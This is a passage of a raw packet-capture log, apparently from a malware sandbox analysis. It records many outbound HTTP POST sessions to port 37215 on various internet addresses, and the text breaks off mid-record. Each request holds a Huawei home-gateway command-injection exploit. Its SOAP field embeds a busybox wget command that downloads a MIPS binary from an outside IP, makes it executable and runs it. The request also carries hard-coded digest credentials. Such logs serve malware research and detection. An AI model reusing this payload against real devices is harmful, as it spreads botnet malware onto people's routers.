                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1160192.168.2.1338538197.100.191.8837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.976877928 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1161192.168.2.134905841.91.167.4537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.979244947 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1162192.168.2.1352294156.57.219.5237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.982582092 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1163192.168.2.1346338197.15.161.21837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.985074043 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1164192.168.2.1358618197.79.118.24437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.988042116 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1165192.168.2.1351220197.193.96.3237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.990691900 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1166192.168.2.134199641.174.142.18137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.993520975 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1167192.168.2.135247241.194.139.11237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.997106075 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1168192.168.2.1359520156.132.151.21837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.999381065 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1169192.168.2.135694041.93.164.4037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:04.001552105 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 